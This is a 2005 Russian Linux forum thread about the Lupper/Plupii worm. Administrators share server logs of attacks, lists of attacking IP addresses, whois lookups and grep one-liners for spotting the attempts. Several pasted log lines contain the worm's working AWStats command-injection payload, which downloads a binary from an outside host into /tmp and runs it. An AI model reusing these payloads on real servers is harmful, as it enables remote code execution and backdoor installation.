Новый Linux червь.

0

0

Lupper (по версии McAfee) или Plupii (по версии Symantec) использует три уязвимости (внедрение удаленного кода в XML-RPC for PHP, неполную проверку параметров в Rawlog-плагине для анализатора логов AWStats и удаленное исполнение кодов в скрипте Webhints) для распространения по хостящим эти скрипты серверам, после чего устанавливает на зараженных серверах бэкдоры.

>>> Подробности

Ссылка

←	GNU/Solaris - реальность!

Дни разработчика Trolltech в Мюнхене

→

← 1 2 →

Ответ на: комментарий от anonymous 08.11.05 16:59:51 MSK

Ивашка Бродяжка если точьнее

~~bugmaker~~ ★★★★☆
(08.11.05 17:36:05 MSK)

Ссылка

Ответ на: комментарий от Cybem 08.11.05 17:27:46 MSK

Дык, тут же уже сообщили, что уязвимость старая. Я просто к тому, что PHP в этом не единственный. А что червь её использует, так это понятно: соотношение между php и python в web знаете?

anonymous
(08.11.05 18:17:17 MSK)

Ссылка

и я у себя нашел поползновения:

202.218.13.113 - - [07/Nov/2005:07:26:02 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e1
93%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;ech
o%20YYY;echo|  HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
202.218.13.113 - - [07/Nov/2005:07:26:03 +0200] "GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e
193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;ec
ho%20YYY;echo|  HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
202.218.13.113 - - [07/Nov/2005:07:26:05 +0200] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e1
93%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;ech
o%20YYY;echo|  HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
202.218.13.113 - - [07/Nov/2005:07:26:07 +0200] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2
e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2
e244;echo%20YYY;echo|  HTTP/1.1" 404 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
202.218.13.113 - - [07/Nov/2005:07:26:07 +0200] "GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%
2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%
2e244;echo%20YYY;echo|  HTTP/1.1" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

признавайтесь, у кого адрес 202.218.13.113

vadiml ★★★★★
(08.11.05 21:37:32 MSK)

Новый червь. Linux. Пробираеца на машины через устройства A: и D:. Уничтожает все данные в минере и линия.

anonymous
(08.11.05 21:41:24 MSK)

Ссылка

Ответ на: комментарий от vadiml 08.11.05 21:37:32 MSK

> признавайтесь, у кого адрес 202.218.13.113

whois 202.218.13.113

хе-хе.. :)

anonymous
(08.11.05 23:58:02 MSK)

Ответ на: комментарий от anonymous 08.11.05 23:58:02 MSK

69.55.228.88 - - [08/Nov/2005:16:54:21 +0300] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e1 74%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115; echo%20YYY;echo| HTTP/1.1" 404 412 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.55.228.88 - - [08/Nov/2005:16:54:22 +0300] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e1 74%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115; echo%20YYY;echo| HTTP/1.1" 404 412 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.55.228.88 - - [08/Nov/2005:16:54:23 +0300] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2 e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e21 2%2e115;echo%20YYY;echo| HTTP/1.1" 404 420 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;

HAW ★★
(09.11.05 00:31:59 MSK)

Ссылка

Ответ на: комментарий от anonymous 08.11.05 23:58:02 MSK

я и сам видел, что "Net Dreamers Co.,Ltd.", но надо что бы САМИ ПРИЗНАЛИСЬ!

vadiml ★★★★★
(09.11.05 00:38:02 MSK)

Ответ на: комментарий от vadiml 09.11.05 00:38:02 MSK

я только что в лог заглядывал, еще с двух мест ломились

vadiml ★★★★★
(09.11.05 00:39:27 MSK)

Ответ на: комментарий от vadiml 09.11.05 00:39:27 MSK

может коллекцию адресов создадим?

vadiml ★★★★★
(09.11.05 00:40:18 MSK)

Ответ на: комментарий от vadiml 09.11.05 00:40:18 MSK

219.254.35.101 - - [08/Nov/2005:18:03:28 +0200] "GET /awstats/awstats.pl?configdir=|echo;echo.....echo%20YYY;echo| HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

vadiml ★★★★★
(09.11.05 00:49:07 MSK)

Ответ на: комментарий от vadiml 09.11.05 00:49:07 MSK

213.25.155.30
60.43.32.157
67.19.236.31
219.166.34.48
69.55.228.88

HAW ★★
(09.11.05 01:19:45 MSK)

Ответ на: комментарий от vadiml 09.11.05 00:38:02 MSK

>"Net Dreamers Co.,Ltd."

Всё мечтают, мечтатели.

anonymous
(09.11.05 01:48:00 MSK)

Ссылка

Ответ на: комментарий от HAW 09.11.05 01:19:45 MSK

+ еще один [error] [client 61.19.38.130] File does not exist: apache/phpgroupware/xmlrpc.php

anonymous
(09.11.05 05:52:25 MSK)

Ответ на: комментарий от anonymous 09.11.05 05:52:25 MSK

inetnum:      61.19.0.0 - 61.19.255.255
netname:      CAT
descr:        CAT Telecom public company Ltd
descr:        International Telecommunications Service Provider
address:      72 Charoenkrung Road Bangrak Bangkok THAILAND 10501
address:      Thailand
person:       Suchok Ardhmad

прикольное имена %о) ...у них в тайланде

anonymous
(09.11.05 05:57:07 MSK)

Ссылка

Ответ на: комментарий от anonymous 09.11.05 05:52:25 MSK

grep "/cgi-bin/awstats.pl?configdir=|echo" /var/log/httpd/access_log | awk '{ printf $1RS; }' | uniq 68.149.67.26 194.6.181.226 81.208.19.149 212.23.14.112

anonymous
(09.11.05 06:00:08 MSK)

Ответ на: комментарий от anonymous 09.11.05 06:00:08 MSK

баним хосты ;-)
213.186.41.184 - - [08/Nov/2005:18:40:07 +0500] "GET /awstats/awstats.pl?configd
193.52.12.33 - - [08/Nov/2005:20:50:14 +0500] "GET /awstats/awstats.pl?configdir
63.239.178.249 - - [08/Nov/2005:22:55:28 +0500] "GET /awstats/awstats.pl?configd

Ruwa ★
(09.11.05 07:15:36 MSK)

Ссылка

Ответ на: комментарий от gh0stwizard 08.11.05 13:40:15 MSK

>>If a system has been infected, Symantec recommends complete reinstallation of the system because it will be difficult to determine what else the computer has been exposed to, the company said.

> Совсем обленились в Симантеке... До этого и так можно было догадаться =)))

Ну а что? :) Чисто так по Виндовому - если резет не поможет, то уж реинсталл сто пудово... :D

LeX ★
(09.11.05 09:51:02 MSK)

Ссылка

Еще несколько придурков

#grep awstats.pl /var/log/apache/access.log | awk '{ print $1 }' | sort |uniq

216.138.114.25
219.37.176.17
24.27.14.18
83.193.112.231

anonymous
(09.11.05 10:16:51 MSK)

Ответ на: Еще несколько придурков от anonymous 09.11.05 10:16:51 MSK

До кучи:

203.198.153.198

80.177.106.176

139.165.110.115

193.24.211.85

81.2.209.13

anonymous
(09.11.05 11:16:54 MSK)

Ответ на: комментарий от anonymous 09.11.05 11:16:54 MSK

Судя по айпишникам, червяк сканит соседей, садится на них, если можно и продолжает сканить дальше...

anonymous
(09.11.05 11:19:36 MSK)

Ссылка

Ответ на: комментарий от anonymous 09.11.05 11:16:54 MSK

и еще

193.50.192.40 195.23.20.83 200.12.63.30 200.198.184.135 200.234.235.20 200.69.195.42 203.114.64.241 203.117.15.18 203.235.202.94 206.71.153.57 209.208.122.203 210.192.122.125 211.173.124.131 211.22.84.102 213.195.205.243 216.130.181.132 216.47.154.96 217.106.234.82 217.11.44.112 218.144.176.117 218.232.109.223 218.90.140.2 219.149.211.2 220.135.88.151 60.248.40.221 61.211.237.37 61.220.134.228 61.220.51.231 61.97.32.12 62.194.204.13 62.195.136.174 62.210.171.134 62.233.216.195 64.251.14.219 66.98.140.27 68.75.86.8 80.237.200.140 82.90.174.226 83.69.44.253

anonymous
(09.11.05 13:13:22 MSK)

Ссылка

Ответ на: комментарий от anonymous 09.11.05 11:16:54 MSK

И еще:

38.246.184.86

205.237.107.202

210.245.188.28

ser_bur ★★
(09.11.05 13:22:04 MSK)

Ссылка

219.254.35.101

vadiml ★★★★★
(09.11.05 13:34:33 MSK)

Ссылка

213.209.95.148
193.24.211.85
220.194.61.230

anonymous
(09.11.05 13:38:13 MSK)

Ответ на: комментарий от anonymous 09.11.05 13:38:13 MSK

И еще 127.0.0.1 ...

anonymous
(09.11.05 19:12:17 MSK)

Только у полных уебанов awstats выставлен жопой наружу. Нормальные люди доступ к директории с awstats паролем закрывают и тогда все кто пытаются через него что-либо ломать просто идут лесом в поле.

anonymous
(09.11.05 20:21:06 MSK)

Ссылка

Ответ на: комментарий от anonymous 09.11.05 19:12:17 MSK

ха-ха-ха ;-)
самый самый главный ip ;-)

Ruwa ★
(10.11.05 06:41:40 MSK)

Ответ на: комментарий от Ruwa 10.11.05 06:41:40 MSK

Список компов с установленным бэкдором. Кому халява? :(

anonymous
(10.11.05 09:01:08 MSK)

Ссылка

Ответ на: комментарий от anonymous 09.11.05 19:12:17 MSK

Нда, переставляй систему.

anonymous
(10.11.05 10:09:44 MSK)

Ссылка

80.81.4.109

vadiml ★★★★★
(10.11.05 13:46:54 MSK)

Ответ на: комментарий от vadiml 10.11.05 13:46:54 MSK

>хотя есть разработки и для ограничения perl и php в виде модуля ядра для linux - называется antikid >А можно подробнее? Гугл ответа не дал.

Зарелизили публичную версию http://ghc.ru/

последняя новость: Antikid - Система обнаружения и блокирования вызовов командной оболочки (shell) из контекста веб-сервера. Предлагаем вашему вниманию первый публичный пре-релиз свободно распространяемой версии системы - Antikid Lite 0.3.0

anonymous
(05.12.05 09:43:03 MSK)

Ссылка

Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.

← 1 2 →

←	GNU/Solaris - реальность!

Безопасность

Дни разработчика Trolltech в Мюнхене

→

Еще несколько придурков

Похожие темы